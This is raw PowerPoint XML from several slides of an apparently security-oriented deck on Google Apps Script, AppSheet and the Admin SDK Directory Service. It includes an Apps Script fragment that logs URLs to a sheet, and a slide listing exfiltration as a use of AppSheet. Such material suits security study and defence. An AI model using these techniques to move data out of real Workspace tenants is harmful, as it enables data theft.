                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(url);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>SpreadsheetApp.getActiveSpreadsheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>getSheets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>()[0].</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>appendRow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>([url]);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HtmlService.createTemplateFromFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('Page');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template.validUrls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>validUrls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template.action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>complete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template.evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="600" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3C4043"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="fr-FR" sz="600" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3C4043"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="ZoneTexte 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3C4D305E-48DA-CABA-F721-D9FF556EC168}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>44/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36357041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2" y="100824"/>
            <a:ext cx="4976737"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Google </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>AppSheet</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="2200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F02C69-90D9-DA30-98AB-2A5BA195A74D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="7887410" cy="3770155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>AppSheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> is a no-code platform that permit to anyone to build application and automated processes without writing a line of code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Some scenarios can used on this Google service like exfiltration:</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Image 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB069925-023D-6F93-4156-A2CFFE7850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5450" y="2498407"/>
            <a:ext cx="5753100" cy="2447925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="ZoneTexte 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843AA8EC-6805-BEA5-4F29-190FFF6304A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="502061" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>45/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2998640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48FD14D8-8908-6C79-0428-A03657532529}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="563639" y="1129606"/>
            <a:ext cx="7932661" cy="3514239"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Application development platform </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Interact with Google applications: Gmail, Google Drive, Google Docs, Google Sheets, etc.) and Google Workspace</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Google Workspace:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>loud-based suite that provides a variety of tools and applications </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Help businesses and organizations communicate, collaborate, and get work done more efficiently</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>Includes applications such as Gmail, Google Drive, Google Docs, Google Sheets, Google Slides, Google Meet, Google Chat, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0"/>
              <a:t>etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>Designed for large organizations with more advanced security and management needs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" lvl="1" indent="-171450" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t> Google Apps Script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="ZoneTexte 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{377EC920-2A0B-239A-D598-DEA84EDC3F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8641080" y="4897279"/>
            <a:ext cx="431528" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>5/47</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="42678767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2" y="100824"/>
            <a:ext cx="7529438"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Admin SDK Directory Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Sous-titre 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9F02C69-90D9-DA30-98AB-2A5BA195A74D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311710" y="1272521"/>
            <a:ext cx="7887410" cy="3770155"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
              </a:rPr>
              <a:t>It is also possible to manage devices, groups, users and other entities in Google Workspace domains (Admin SDK Directory Service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://developers.google.com/admin-sdk/directory/reference/rest</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" lvl="1" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="2" indent="-285750" algn="l">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1450" dirty="0">
              <a:latin typeface="Proxima Nova" panose="020B0604020202020204"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle : coins arrondis 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4CCF09C-294D-6598-1FCE-0A4626E16040}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1450480" y="2300532"/>
            <a:ext cx="2374321" cy="275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1000" b="1" dirty="0"/>
